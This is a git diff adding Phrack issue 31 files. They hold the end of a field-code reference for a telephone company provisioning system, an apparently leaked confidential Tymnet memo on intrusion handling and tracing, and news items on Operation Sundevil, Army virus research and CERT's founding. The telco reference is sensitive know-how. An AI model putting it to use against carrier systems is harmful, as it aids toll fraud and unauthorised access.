+     DI=Deny Incoming
+     DO=Deny Outgoing
+     RS=Restore Suspended Circuit
+     SB=Suspend Both Ways
+     SD=Season Disconnect
+     SI=Suspend Incoming
+     SO=Suspend Outgoing
+     DX=Deny Toll Access Tervice
+SSV  Suspend Service Type
+     SSV XX
+     DO=Deny Outward Service
+     DB=Deny Both Outward and Inward Service
+     DX=Deny Toll Access Service
+     RS=Restore Denied Service
+STAT Order Status
+     STAT XX
+     AC=Pending With no Framd or Installation Completion
+     FC=Pending With Frame Completion but no Installation Completion
+     IC=Pending with Installation Complation but no Frame Completion
+     CC=Completed Orders
+     CA=Canceled Orders
+STAT Facility Status
+     STAT XX
+     AS=All Spare
+     EX=Excluded
+     PC=Pending Connect
+     RS=Reserved
+     SF=Spare Facility
+     UK=Unknown
+     WK=Working
+STAT Load Group Status
+     STAT XX
+     EX=Blocked from all Assignments
+     FU=Open for Dial Transfer Assignments Only
+     PS=Pseudo LEN Assignments Only
+     SO=Open for Service Orders and Work Orders Only
+     WK=Open for All Assignments
+STO  Line Equipment Status
+     STO XX
+     AW=All Working
+     MS=Miscellaneous
+     OF=Official
+     TJ=Trunk and Junctor
+     TS=Test
+     WK=Working
+     PD=Pending Disconnect
+     PK Pending Disconnect/Pending New Connect
+     AS=All Spare
+     EX=Excluded
+     LI=Left-in Disconnect
+     RS=Reserved
+     SF=Spare
+     UK=Unknown
+     PC=Pending Connect
+STP  Cable and Pair Status
+     STP XX
+     AL=All Pairs
+     AD=All Defective
+     AP=All Provisioned
+     AW=All Working
+     DC=Designed Circuit
+     DI=Defective (I=1-9)
+     DM=Designed + SSM
+     DP=Designed + SSP
+     SM=Special Safeguard Measures
+     SP=Special Safeguard Protection
+     SS=Special Status
+     WK=Working
+     AS=All Spare
+     EX=Excluded
+     LI=Left-in Disconnect
+     RS=Reserved
+     SF=Spare
+     UK=Unknown
+     PC=Pending Connect
+     PD=Pending Disconnect
+STT  Telephone Number Status
+     STT XX
+     AU=Auxiliary
+     AW=All Working
+     MS=Miscellaneous
+     NP=Non-published
+     OF=Official
+     TJ=Trunk and Junctor
+     TS=Test
+     WK=Working
+     AS=All Spare
+     AV=Available
+     CM=Changed-Machine Intercept
+     CO=Changed-Operator Intercept
+     DM=Disconnected-Machine Intercept
+     DO=Disconnected-Operator Intercept
+     EX=Excluded
+     RS=Reserved
+     SF=Spare
+     UK=Unknown
+     PC=Pending Connect
+     PD=Pending Disconnect
+     PK=Pending Disconnect/Pending New Connect
+SUBL Sublet Service
+     SUBL XXX-XXXX
+     XXX-XXXX=Telephone Number
+SWC  Set Work Code
+     SWC XXX
+     (See Print Work Code)
+SWG  Switch Group
+     SWG X
+     X=0-2
+SYS  Machine Number
+     SYS XX...XX
+     XX...XX=Maximum of 12 Alphanumeric Characters
+TA   Transfer Assembly
+     TA X
+     Y=Yes
+     N=No
+TAP  Touchtone Assignment Priority Number
+     TAP X
+     X=Numeric
+TBA  TBA Relay
+     TBA XYY-ZZZ
+     X=Marker Group Number (Numeric)
+     YY=Number Group Frame (Numeric)
+     ZZZ=Relay Number (Numeric)
+TBS  TBS Relay
+     TBS XZ-NN
+     X=Marker Group Number (0-9)
+     Z=Relay Number (0-3)
+     NN=Ringing Combination (01-16)
+TC   TO Cable
+     TX XX...XX
+     XX...XX=Maximum of 10 Alphanumeric Characters
+TER  Terminal
+     TER XXXX
+     XXXX=Maximum of 4 Numeric Characters
+TER  Terminal Number
+     TER Y-XXXX-ZZZZ
+     Y=Control Group (Alphanumeric)
+     XXXX=Group Number (Numeric)
+     ZZZZ=Terminal Number (Numeric)
+THG  Thousands Group
+     THG X or
+     THG XXXX
+     X=0-9
+     XXXX=0000,1000,...,9000
+TK   Trunk Cable and Pair Number
+     TK YYYYYY-XXXX
+     YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters)
+     XXXX=Cable Pair ID (Maximum of 4 Numeric Characters)
+TLI  Telephone Line Identifier
+     TLI XXX-YYY-XXXX
+     X=Numeric
+     Y=Alphanumeric
+TN   Telephone Number
+     TN XXX-XXXX
+     XXX-XXXX=Telephone Number
+TOM  Two or More Non-pending, Non-party Filtered Circuit Facilities
+     TOM XX
+     CP=Cable Pair
+     TN=Telephone Number
+     OE=Office Equipment
+TP   Tie Pair
+     TP YY...YY-XXXX
+     YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters)
+     XXXX=Tie Pair ID (Maximum of 4 Numeric Characters)
+TPR  Taper Code
+     TPR XXXXXX
+     XXXXXX=Maximum of 6 Alphanumeric Characters
+TRE  Transmission Equipment
+     TRE XX...XX
+     XX...XX=Maximum of 17 Alphanumeric Characters
+TT   Telephone Number Type
+     TT X
+     B=POTs Hunting
+     C=Coin
+     G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc)
+     O=Official
+     Q=Centrex
+     X=POTx Non-hunting
+TTA  Terminating Traffic Area
+     TTA XXX
+     XXX=Maximum of 3 Alphanumeric Characters
+TYP  Switching Type
+     TYP XXX
+     1ES=Number 1ESS
+     2ES=Number 2ESS
+     3ES=Number 3ESS
+     5ES=Number 5ESS
+     RSS=Remote Switching System
+     1XB=Number 1 Cross-bar
+     5XB=Number 5 Cross-bar
+     SXS=Step-by-step
+     DMX=DMS-10
+     DMC=DMS-100
+US   USOC
+     US XXXXX
+     XXXXX=Maximum of 5 Alphanumeric Characters
+USE  Entity Usage
+     USE X
+     G=Growth
+     S=Stable
+VAL  Minimum Valid Hours for Entity Data
+     VAL XX
+     XX=1-99
+WC   Wire Center
+     WC XX
+     XX=Alphanumeric
+WL   Work Location
+     WL Y
+     Y=1-8    or
+     WL XXX
+     ADM=Administrative
+     ACT=Assignment Change Ticket
+     CPC=Special Service Circuits
+     MCT=Maintenance Change Tickets
+WPN  Work Package Number
+     WPN XXXX
+     XXXX=1-9999
+WPT  Work Package Type
+     WPT XXX
+     XXX=Maximum of 3 Alphanumeric Characters
+XN   "X" Number
+     XN XXX-YYXX  or
+     XN XXX-YXX
+     X=Numeric
+     Y=Alphanumeric
+ZN   Zone Location
+     ZN XXX
+     XXX=001-999
+=============================================================================
+ACKNOWLEDGEMENTS
+Skinny Puppy for refreshing my memory
+The Urvile for the "$*" file and further usage of echo
+Bell Laboratories OPA-1Y600-01
+
+_______________________________________________________________________________
diff --git a/phrack31/7.txt b/phrack31/7.txt
new file mode 100644
index 0000000..da1f9ca
--- /dev/null
+++ b/phrack31/7.txt
@@ -0,0 +1,139 @@
+                                 ==Phrack Inc.==
+                  Volume Three, Issue Thirty-one, Phile #7 of 10
+                              COMPANY CONFIDENTIAL
+                               INTERIM MEMORANDUM
+
+              SUBJECT:  TYMNET SUPPORT FOR CUSTOMER'S DATA SECURITY
+       PURPOSE:  This document provides background, and general procedures
+       and practices used to support customers with suspected security
+       problems.  Field Sales is the intended audience but is a general
+       document and may be useful to other customer support personnel.
+       Currently, this document is in a final review.  Meanwhile, it is to
+       retain the status of an internal proprietary document.
+       BACKGROUND:  BT Tymnet Inc, and its Network Systems Company,
+       believe information integrity is vital to ourselves and our
+       customers.  One way TYMNET insures integrity is by providing good
+       security.  TYMNET has a baseline security of user name, password,
+       and user access profile available for all customers.  Further, there
+       are two security products.  One permits the customer to limit
+       password life (password automatically expires after a customer
+       elected time period) and the other permits the end user to change
+       his/her own password.  Since we do consider security a key issue,
+       we continue to develop other security features.  Also, we work with
+       Security vendors to certify their security products on our network,
+       thus permitting customers to add such products, should they so
+       desire.
+       We have established Network Systems Company Policies which provide
+       a framework for the information contained herein (see NSC Policy
+       121 and 122.  More policies are in distribution as of this
+       writing).  It is highly recommended that these policies be reviewed
+       since they represent the framework of this document.
+       Legal considerations are another key issue in any security case.
+       Support, other then providing the customer with related security
+       data, can only occur if law(s) have been broken.  The
+       legal issues are complex and only a minimal information is
+       provided herein.  At at the heart of this issue is the fact that
+       the customer is the injured party, not TYMNET.  Patience and good
+       communication may be required to get the customer to understand
+       this fact.  The customers must act for themselves to obtain
+       law enforcement support.  TYMNET will support that activity, and
+       help to the degree possible, much as a "friend of the court".
+       THE SUPPORT:  We provide security support as a responsible
+       network service provider.  The first step in that support is for
+       the field sales representative to act as a security consultant to
+       the customer, at least to the extent explained below.
+       The customer is well advised to plan in advance "what to do
+       when Captain Midnight strikes" -- contingency planning, pure
+       simple.  First there are two basic alternatives to choose from:
+                              PROTECT AND PROCEED
+                                       OR
+                              PURSUE AND PROSECUTE
+       "Protect and proceed" means 1) determine how the incident
+       occurred, 2) plug the security leak/hole, and 3) go on with
+       business as normal.
+       (Do we want written notification of the Intent to "Pusue and
+       Prosecute" from the "Injured Party?").
+       "Pursue and prosecute" is just that.  The first step is having
+       the customer obtain legal support, and both we and the customer
+       continue to gather evidence until the suspect is apprehended.  The
+       next step is the prosecution in a court of law.  (The final step is
+       to return to the first alternative, e.g., now protect and
+       proceed.)
+       The customer needs to judge each case  on its own merits, but
+       generally the first choice is the wiser one.  The second choice
+       involves considerable effort, mostly by the customer and law
+       enforcement agency(s), possible negative publicity for the
+       customer and does not necessarily result in successful prosecution.
+       Good contingency planning also includes becoming familiar with the
+       laws and the local law enforcement people.
+       The starting point is a suspected incident.  Herein, we will address
+       the case where the customer has identified a suspected intruder.
+       Generally, that occurs by a customer's detailed review of billing
+       or host based security exception reports.
+       At this point it is essential the field sales representative open a
+       ticket containing at least the following:  1) customer name and CID,
+       2) host(s) involved, 3) incident start and stop times, and 4) the
+       customer's objective.  Add any other information deemed helpful.
+       Other support may be an on-line trace of the call, if the
+       suspect is currently on-line.  Field support should do this trace, or
+       alternately, this same help can be obtained by calling network
+       customer support and/or NetCon.  In any case it must be done while
+       the suspect is on-line.  Such trace information should be
+       included on the ticket.
+       Based on the customer's position; the case will fit either
+       "prevent and proceed" or, "pursue and prosecute".  The former is
+       straight forward, in that TYMNET security will research the
+       incidents(s), and provide data (generally user name and point of
+       origin(s) to the customer via Field Sales, with recommendations
+       on how to prevent any further occurrence.  We do provide this
+       service as a responsible vendor, although strict interpretation
+       of NSC policy 121 precludes it.  However, we do apply the policy if
+       a customer continues to ask for data without taking preventative
+       action.
+       The "pursue and prosecute" case is complex, and is different for each
+       situation.  It will be explained by using a typical scenario.  After
+       the first step (as above), it is necessary to gather data sufficient
+       to show a pattern of intrusion from a single TYMNET access point.
+       With this information, the customer (the injured party) must contacts
+       law enforcement agency(s), with the one exception noted below.
+       If that intrusion point is through a gateway from a foreign
+       country, for all practical purposes, the customer can do little to
+       prosecute.  The law(s) of the foreign country will apply since
+       extradition is most unlikely.  Therefore, action will have to be
+       have to be initiated by the network service provider in the
+       foreign country.  In this case, TYMNET security will have MIS
+       research the session details to obtain the Network User
+       Identifier, and External Network Support (Jeff Oliveto's
+       organization) will communicate that information to the foreign
+       network for their action (cases involving U.S. government computers
+       may get special treatment - see for example - Communications of the
+       ACM, May, 1988, article on "Stalking the Wiley Hacker").
+       Most all security incidents on our network are caused by international
+       hackers using X.121 addressing.  Frequently, our customer is unaware
+       of the risk of X.121 addressing, and permits it.  BE SURE YOUR
+       CUSTOMERS KNOW THAT THEY CAN CHOOSE FULL TYMNET SECURITY FEATURES,
+       THEREBY PRECLUDING SUCH INTRUSIONS FROM X.121 ADDRESSING FROM
+       FOREIGN NETWORKS.
+       For the domestic case, the customer gets law enforcement (attorney
+       general at incoming call location, secret service if credit card
+       fraud is involved, or possibly the FBI, depending on the incident)
+       to open a case.  Note, damage in estimated dollars is usually
+       necessary to open a case, and many agencies will not take action on
+       small claims.  For example, as of December, 1988, the Los Angeles
+       Attorney will not open a case for less than $10,000 (they have too
+       big a caseload at higher damages).
+       Assuming legal support is provided, a court order for a wire tap
+       and trace will be obtained, thereby determining the caller's phone
+       number (this step can be very involved and time consuming for long
+       distance calls).  The next legal action occurs after the calling
+       number is identified.  A search warrant is obtained for searching the
+       facility housing the phone location.  Normally, this search will
+       gather evidence sufficient for prosecution.  Evidence is typically
+       the necessary terminal equipment, printouts, diskettes, etc.  Then,
+       at long last the prosecution.  Also note, again at the time the
+       calling number is identified, the injured party should use the
+       "protect and proceed" plan.
+       For further information, contact Data Security, TYMNET Validations,
+       or Ontyme NSC.SECURITY.
+
+_______________________________________________________________________________
diff --git a/phrack31/8.txt b/phrack31/8.txt
new file mode 100644
index 0000000..53714cc
--- /dev/null
+++ b/phrack31/8.txt
@@ -0,0 +1,235 @@
+                              ==Phrack Inc.==
+               Volume Three, Issue Thirty-one, Phile #8 or 10
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN              Phrack World News              PWN
+            PWN             Issue XXXI, Part One            PWN
+            PWN         Compiled by Phreak_Accident         PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Operation "Sun-Devil"
+=====================
+     May 9th and 10th brought on two day thats would be marked in every hackers
+history book.  The reason we assume these days will be important to many, is
+that maybe it's time we opened are eyes and saw the witch hunt currently in
+progress.
+     In less than 48 hours, 150 Secret Service men and other law officials
+served 30 search warrents in 14 cities around the nation (This thing was hudge).
+     Operation "Sun-Devil" (As the Attorney General in Phoenix called it), was
+a success on their part. "The investigation though is not over,  and there are
+more warrents to be executed.", said Jim Folwer of L.A's Secret Service.
+     Any details of the investigation are not being given out at this time.
+The Asst. Attorney General of Pheonix told Phrack Inc. that there were other
+problems involving the investigation and that it was an ongoing investigation
+for the last TWO years.
+     It is my understanding that Gail Thackeray and the Secret Service are not,
+taking this lightly.  She told Phrack inc. that they are not distinquishing
+pirates, hackers, or phreakers.  Basically, it's any kid with a modem that calls
+a BBS with an alias.  Yes, we are the witches, and we are being
+hunted.
+     The following are Two news releases obtianed via fax through the U.S.
+Secret Service for Phrack Inc.
+
+                  N E W S     R E L E A S E
+FOR IMMEDIATE RELEASE             CONTACT:  Gail Thackeray
+------------------------          Assitant Attorney General
+May 9, 1990 @ 11:00 A.M.          (602) 542-4266
+
+     Attorney General Bob Corbin announced today that in
+connection with an eighteen-month joint investigation into
+computer crime conducted with the United States Secret
+Service and the United States Attorney's office, the Arizona
+Attorney General's office has executed seven search warrants
+in which computers, electronic bulletin boards, telephone
+test equipment and records have been seized.
+     The Organized Crime and Racketeering Division
+investigation involved complaints by Arizona and out of state
+victims of substantial financial losses resulting from credit
+card fraud and theft of long distance telephone and data
+communications services, and by victims of attacks on
+computer systems operated by government agencies, private
+corporations, telephone companies, financial institutions,
+credit bureaus, and a hospital.
+     The Arizona Attorney General's office received
+information and technical assistance from the Glendale,
+Arizona Police Department's Computer Crime Unit, and from
+many private sector sources, including Bellcore (Bell
+Communications Research), American Express, Communications
+carriers U.S. Sprint, AT&T, MCI, Com Systems, MidAmerican
+Communications, LDL Communications, and Shared Use Network.
+Without the cooperation of these companies and of numerous
+federal, state and local law enforcement agencies around the
+country, this investigation would have been impossible.
+     The privacy of our citizens and the health of our
+economy depend upon secure, reliable computer systems.
+Computer fraud and attempts to compromise senstitive public
+and private computer systems will not be tolerated.
+Individuals who commit these offenses in Arizona can expect
+to be prosecuted.
+
+.end.
+                 P R E S S     R E L E A S E
+FOR IMMEDIATE RELEASE        Contact:  Wendy Harnagel
+Wednesday, May 9, 1990       United States Attorney's Office
+----------------------       (602) 379-3011
+     PHOENIX -- Stephen M. McNamee, United States Attorney
+District of Arizona, Robert K. Corbin, Attorney General for
+the State of Arizona, and Henry R. Potosky, Acting Special
+Agent in Charge of the United States Secret Service Office in
+Phoenix, today announced that approximately twenty-seven
+search warrants were executed on Monday and Tuesday, May 7
+and 8, 1990, in various cities across the nation by 150
+Secret Service agents along with state and local law
+enforcement officials.  The warrants were issued as a part of
+Operation Sundevil, which was a two year investigation into
+alleged illegal computer hacking activities.
+     The United States Secret Service, in cooperation with
+the United States Attorney's Office, and the Attorney General
+for the State of Arizona, established an operation utilizing
+sophisticated investigative techniques, targeting computer
+hackers who were alleged to have trafficked in and abuse
+stolen credit card numbers, unauthorized long distance
+dialing codes, and who conduct unauthorized access and damage
+to computers.  While the total amount of losses cannot be
+calculated at this time, it is estimated that the losses may
+run into the millions of dollars.  For example, the
+unauthorized accessing of long distance telephone credit
+cards have resulted in uncollectible charges.  The same is
+true of the use of stolen credit card numbers.  Individuals
+are able to utilize the charge accounts to purchase items for
+which no payment is made.
+     Federal search warrants were executed in the following
+cities:
+
+     Chicago, IL
+     Cincinatti, OH
+     Detroit, MI
+     Los Angeles, CA
+     Miami, FL
+     Newark, NJ
+     New York, NY
+     Phoenix, AZ
+     Pittsburgh, PA
+     Plano, TX
+     Richmond, VA
+     San Diego, CA
+     San Jose, CA
+     Unlawful computer hacking imperils the health and
+welfare of individuals, corporations and government agencies
+in the United States who rely on computers and telephones to
+communicate.
+     Technical and expert assistance was provided to the
+United States Secret Service by telecommunication companies
+including Pac Bel, AT&T, Bellcore, Bell South, MCI, U.S.
+Sprint, Mid-American, Southwestern Bell, NYNEX, U.S. West,
+and by the many corporate victims.  All are to be commended
+for their efforts for their efforts in researching intrusions
+and documenting losses.
+     McNamee and Corbin expressed concern that the improper
+and alleged illegal use of computers may become the White
+Collar crime of the 1990's.  McNamee and Corbin reiterated
+that the state and federal government will vigorously pursue
+criminal violations of statutes under their jurisdiction.
+Three individuals were arrested yesterday in other
+jurisdictions on collateral or independent state charges.
+The investigations surrounding the activities of Operation
+Sundevil are continuing.
+     The investigations are being conducted by agents of the
+United States Secret Service and Assistant United States
+Attoryney Tim Holtzen, District of Arizona, and Assistant
+Arizona Attorney General Gail Thackery.
+
+.end.
+_______________________________________________________________________________
+Virus mania
+===========
+     Robert T. Morris started it all.  Who cares, it's over and done with.
+Never the less, it's being dragged out in every national paper.  It's old news
+so we won't cover it here, but we will tell you about something the Army has up
+its sleeve.
+                    Army is Looking for a Few Good Viruses
+                             By Rory J. O'conner
+                           Knight-Ridder Newspapers
+                    ______________________________________
+     The U.S. Army is looking for help to develop the seeds of a new-age germ
+warfare: It wants business to help it turn computer "viruses" into military
+weapons.
+     Experts predict the viruses, if sucessfully developed, could be used to
+wreak havoc on the increasing number of computers in the battlefield.  The
+destructive computer programs which have increasingly damaged commercial and
+research computer systems in the past four years, could be used to disrupt
+military communications and feed misleading data to enemy commanders.
+     The viruses could aslo be used to alter the programming of crucial
+communications satellites serving combat units, the experts said.
+     The Army is soliciting bids from small businesses to determine the
+feasibility of using computer viruses in warefare.  And it is willing to pay up
+to $550,000 to a company that comes up with a plan for creating the programs -
+and figures out how to use military radio systems to introduce them into enemy
+computers.
+     A computer virus is a kind of program designed to disrupt normal operation
+of a computer system or damage data ont hat system by altering or destroying
+it.  The rogue programs are most effective when introduced secretly into the
+computer system of an unsuspecting user and when their damage is subtle or
+hidden fromt he user for some time.
+     Viruses are also self-duplicating and can spread undetected from an
+infected computer to other computer systems they contact.
+     So far, more than 60 computer viruses have been identified, most of them
+attacking poorly guarded personal computers used by businesses, universities
+and inividuals.  The Army's virus would have to be more sophisticated than
+those programs.
+     But some detractors of the concept say the Army could wind up with the
+same problem it has with biological weapons:  Creating destructive elements
+that might get loose and cause widespread damage to its own forces as well as
+civilians.
+     "This stuff is very dangerous, and most people involved in creating
+viruses are not aware of the threat," said a Bay Area virus expert who asked ot
+to be named.  "You can't spread anthrax around the world and not have it come
+back around to you.  And the enemy is using the same kind of computers and
+software that we are."
+      Many experts who are fighting the explosion in virus activity by amateur
+programmers are especially angry at government efforts to develop the programs
+for the military.  Some say it is particulary troubling in light of the
+sentencing of Robert T. Morris Jr. (Ed -Ick), convicted in federal court of
+sending a similar program through a government sponsored network in 1988.
+      "It bothers me that the government says in one breath (viruses) are bad
+and illegal and then asks for someone to develop them," said Glenn Tenney, a
+San Mateco, Calif., programmer and organizer of the annual Computer Hackers
+Conference.  "If Morris had done the same thing for the Army, they'd have paid
+him hundreds of thousands to do it.  But he did it on the wrong side and got
+punished."
+       Computer experts say creating a virus to the Army's specifications is
+possible with current technology - although some of the Army's requirements
+could make developing it more difficult than creating an ordinary personal
+computer virus.
+       First, military computer systems are usually designed with far more
+security features than commercial systems, making it much harder for a virus to
+enter the systems.  Second, the Army is emphasizings the use of radio
+communication to inject the virus into enemy systems.  Normally, computer
+viruses spread through the exchange of floppy disks that contain the rogue
+program or along wires connecting several computers.  Using complex military
+radio signals instead would require expertise that mose programmers don't have.
+.end
+_______________________________________________________________________________
+RIPCO    May 8th, 1990
+-----    -------------
+     Operation Sun-Devil claimed more than just a few "Codelords" around the
+states, it claimed one of the oldest and more popular boards.  Nobody knows
+when or if RIPCO shall return.
+     Reportedly, Dr. Ripco was charge on a hand-gun violation after his house
+was searched.  Phrack inc. can't comment on this.
+     The following is the exact transcript of the message left on RIPCO's
+answering maching after Operation Sun-Devil.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+This is 528-5020.
+As you are probably aware, on May 8, the Secret Service conducted a series
+of raids across the country.  Early news reports indicate these raids
+involved people and computers that could be connected with credit card and
+long distance toll fraud. Although no arrests or charges were made, Ripco
+BBS was confiscated on that morning.  It's involvement at this time is
+unknown. Since it is unlikely that the system will ever return, I'd just l
+say goodbye, and thanks for your support for the last six and a half years.
+It's been interesting, to say the least.
+Talk to ya later.
+  {Dr. Ricpo}
+                       *** END OF VOICE MESSAGE ***
+_______________________________________________________________________________
diff --git a/phrack31/9.txt b/phrack31/9.txt
new file mode 100644
index 0000000..16b628c
--- /dev/null
+++ b/phrack31/9.txt
@@ -0,0 +1,218 @@
+                               ==Phrack Inc.==
+                 Volume Three, Issue Thirty-one, Phile #9 of 10
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN             Phrack World News               PWN
+              PWN            Issue XXXI, Part Two             PWN
+              PWN        Compiled by Phreak_Accident          PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+{C}omputer {E}mergency {R}esponse {T}eam
+----------------------------------------
+     Some call it "Internet Police" -- Others call it "just stupid."
+CERT however is a mix.  But I do give them credit -- After all, have your
+number one goal being 'making the Internet more secure' has to be a tough task.
+Therefore, we give them credit.
+     However, CERT is funded by DARPA, which is a government agency.  And
+anything in my book that the government runs is bad news.  Yes, the government
+pays the 6 man salary and keep their hot-line active 24 hours a day.
+     Ahh..  What do you know about CERT?  "Nothing" you say?  Well, the
+following is the press release and other reprints of information about CERT.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Richard Pethia <rdp@SEI.CMU.EDU>
+DEAR XXXXXXXXX,
+I have been reviewing our correspondence files and have discovered
+that your request for information may not have been filled.  I
+apologize for the delay and hope that the information is still useful
+to you.  If, after reading the following, you have additional
+questions or would like to subscribe to one of our information lists,
+please send email with your question/request.
+The Computer Emergency Response Team (CERT) was established by the Defense
+Advanced Research Projects Agency in November of 1988 to serve members
+of the Internet Research community.  The press release below describes
+the general role of the CERT.
+More specifically, the CERT supports individual Internet sites by:
+ -Working with site personnel to help resolve individual computer security
+  incidents.  Contact potentially affected sites to warn them of
+  possible security breaches.  Work with sites to change the
+  conditions that allowed incidents to occur.
+ -Issuing advisories that alert the community to specific system
+  vulnerabilities or intrusion techniques, as well as the methods to
+  protect against them.
+ -Working with the community and system (primarily Unix) vendors to
+  reslove specific system vulnerabilities.
+ -Maintaining and operating moderated mailing lists that: (1) provide a
+  discussion forum for tools and techniques to improve the security of
+  Unix systems, and (2) provide a discussion forum and alert mechanism
+  for PC viruses, trojan horses, etc.
+Over the past year we have developed hundreds of working relationships
+with members of the Internet and other communities and have
+established an extensive information collection and dissemination
+network.  Because of this network of cooperating individuals and
+organizations, we are often able to advise the community of problems
+allowing them to take corrective action before being affeceted by
+those problems.
+---------------------
+                                                No.  597-88
+                                                (202) 695-0192 (Info.)
+                                                (202) 697-3189 (Copies)
+IMMEDIATE RELEASE       December 6, 1988        (202) 697-5737
+(Public/Industry)
+        DARPA ESTABLISHES COMPUTER EMERGENCY RESPONSE TEAM
+The Defense Advanced Research Projects Agency (DARPA) announced today
+that it has established a Computer Emergency Response Team (CERT) to
+address computer security concerns of research users of the Internet,
+which includes ARPANET.  The Coordination Center for the CERT is
+located at the Software Engineering Institute (SEI), Carnegie Mellon
+University, Pittsburgh, PA.
+In providing direct service to the Internet community, the CERT will
+focus on the special needs of the research community and serve as a
+prototype for similar operations in other computer communities.  The
+National Computer Security Center and the National Institute of
+Standards and Technology will have a leading role in coordinating the
+creation of these emergency response activities.
+The CERT is intended to respond to computer security threats such as
+the recent self-replicating computer program ("computer virus") that
+invaded many defense and research computers.
+The CERT will assist the research network communities in responding to
+emergency situations.  It will have the capability to rapidly
+establish communications with experts working to solve the problems,
+with the affected computer users and with government authorities as
+appropriate.  Specific responses will be taken in accordance with
+DARPA policies.
+It will also serve as a focal point for the research community for
+identification and repair of security vulnerabilities, informal
+assessment of existing systems in the research community, improvement
+to emergency response capability, and user security awareness.  An
+important element of this function is the development of a network of
+key points of contact, including technical experts, site managers,
+government action officers, industry contacts, executive level
+decision-makers and investigative agencies, where appropriate.
+Because of the many network, computer, and systems architectures and
+their associated vulnerabilities, no single organization can be
+expected to maintain an in-house expertise to respond on its own to
+computer security threats, particularly those that arise in the
+research community.  As with biological viruses, the solutions must
+come from an organized community response of experts.  The role of the
+CERT Coordination Center at the SEI is to provide the supporting
+mechanisms and to coordinate the activities of experts in DARPA and
+associated communities.
+The SEI has close ties to the Department of Defense, to defense and
+commercial industry, and to the research community.  These ties place
+the SEI in a unique position to provide coordination support to the
+software experts in research laboratories and in industry who will be
+responding in emergencies and to the communities of potentially
+affected users.
+The SEI is a federally-funded research and development center,
+operating under DARPA sponsorship with the Air Force Systems Command
+(Electronic Systems Division) serving as executive agent.  Its goal is
+to accelerate the transition of software technology to defense
+systems.  Computer security is primarily a software problem, and the
+presence of CERT at the SEI will enhance the technology transfer
+mission of the SEI in security-related areas.
+                                        -END-
+
+QUESTIONS AND ANSWERS:  DARPA ESTABLISHES CERT, 12/6/88
+Q: Can you provide background on earlier break-ins?
+A: On November 2, 1988, thousands of computers connected to
+unclassified DoD computer networks were attacked by a virus.  Although
+the virus did not damage or compromise data, it did have the effect of
+denying service to thousands of computer users.  The computer science
+research community associated with the Defense Advanced Research
+Projects Agency (DARPA), along with many other research laboratories
+and military sites that use these networks, quickly responded to this
+threat.  They developed mechanisms to eliminate the infection, to
+block the spread of the self-replicating program, and to immunize
+against further attack by similar viruses.  Software experts from the
+University of California at Berkeley, with important contributions
+from the Massachusetts Institute of Technology and other network
+sites, rapidly analyzed the virus and developed immunization
+techniques.  These same software experts also provided important
+assistance in the more recent Internet intrusion of 27-28 November.
+As the events unfolded, DARPA established an ad hoc operation center
+to help coordinate the activities of software experts working around
+the clock and to provide information to appropriate government
+officials.  The operations center had three main tasks.  It
+facilitated communications among the many groups affected, it ensured
+that government organizations were promptly informed of developments,
+and it provided initial technical analysis in DoD.  Although the
+threat was contained quickly, a more maliciously designed virus could
+have done serious damage.
+The recent events serve as a warning that our necessarily increasing
+reliance on computers and networks, while providing important new
+capabilities, also creates new kinds of vulnerabilities.  The
+Department of Defense considers this an important national issue that
+is of major concern in both the defense and commercial sectors.  The
+DoD is developing a technology and policy response that will help
+reduce risk and provide an emergency reaction response.
+Q: Who will be on the CERT?
+A: The CERT will be a team of over 100 experts located throughout the
+U.S.  whose expertise and knowledge will be called upon when needed.
+When not being called upon, they will continue their normal daily
+work.  As noted in the release, these experts will include: technical
+experts, site managers, government action officers, industry contacts,
+executive-level decision-makers and representatives from investigative
+agencies.
+recommendations that will be acted upon by DoD authorities.
+Q: Is the CERT fully operational now?
+A: We are in the very early stages of gathering people for the CERT.
+We are first concentrating on collecting technical experts.  A staff
+is in place at SEI, but details are still being worked out.
+Q: Will there just be one CERT?
+A: The intent is that each major computer community may decide to
+establish its own CERT.  Each CERT will therefore serve only a
+particular community and have a particular technical expertise.  (The
+DARPA/SEI CERT will serve, for example, the research community and
+have expertise in Berkeley-derived UNIX systems and other systems as
+appropriate.)  The National Computer Security Center and the National
+Institute of Standards and Technology will support the establishment
+of the CERTs and coordinate among them.
+Q: What are the special needs of the research community that their
+CERT will serve?
+A: The special challenge of the research community is improving the
+level of computer security without inhibiting the innovation of
+computer technology.  In addition, as is often DARPA's role, their
+CERT will serve as a prototype to explore the CERT concept so that
+other groups can learn and establish their own.
+Q: Does the CERT Coordination Center have a press point of contact?
+A: No.  Their function is to serve as a nerve center for the user
+community.
+.end
+_______________________________________________________________________________
+USA Today and the devil
+-----------------------
+     Many controversies have been made of the article printed in USA Today
+after Operation Sun-Devil took it's toll.
+     Phrack inc. tried to contact the author, and with no luck she wasn't
+accepting phone calls.  Please remember, this is only a USA Today article --
+C'mon, get real USAT.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+byline 'Debbie Howlett, USA Today' reads:
+A network of computer hackers operating in 14 cities -- which bilked phone
+companies of $50 million -- has been unplugged, police say.
+"We're not talking about somebody who played Space Invaders too many
+times," says Tim Holtzen, spokesman for the U.S. attorney in Phoenix.
+The hackers -- the largest such ring discovered in the USA --broke into
+phone company and bank computer systems to obtain account numbers and run
+up an unknown total in debts, police say.
+"The main thing is the life-threatening information these computer hackers
+were trying to get into," says Richard Adams of the Secret Service.  "It
+goes beyond being monetary to totally mischievous."
+The ring was uncovered 18 months ago, when members tried and failed to
+infiltrate computers at Barrows Neurological Institute in Phoenix.
+They later tried to block incoming calls to the 911 emergency service in
+Chicago.  The motivation?  "The primary reason is as kind of a malicious
+hobby." says Gary Chapman of Computer Professionals for Social
+Responsibility.  "People are interested in testing their skills against
+security measures." But, Adams says, "I hate to minimize it by saying it
+was just for kicks."
+Police seized 40 computers and 23,000 disks during searches Tuesday in 14
+cities, officials said Wednesday.  Five men, between the ages of 19 and 24,
+have been arrested.
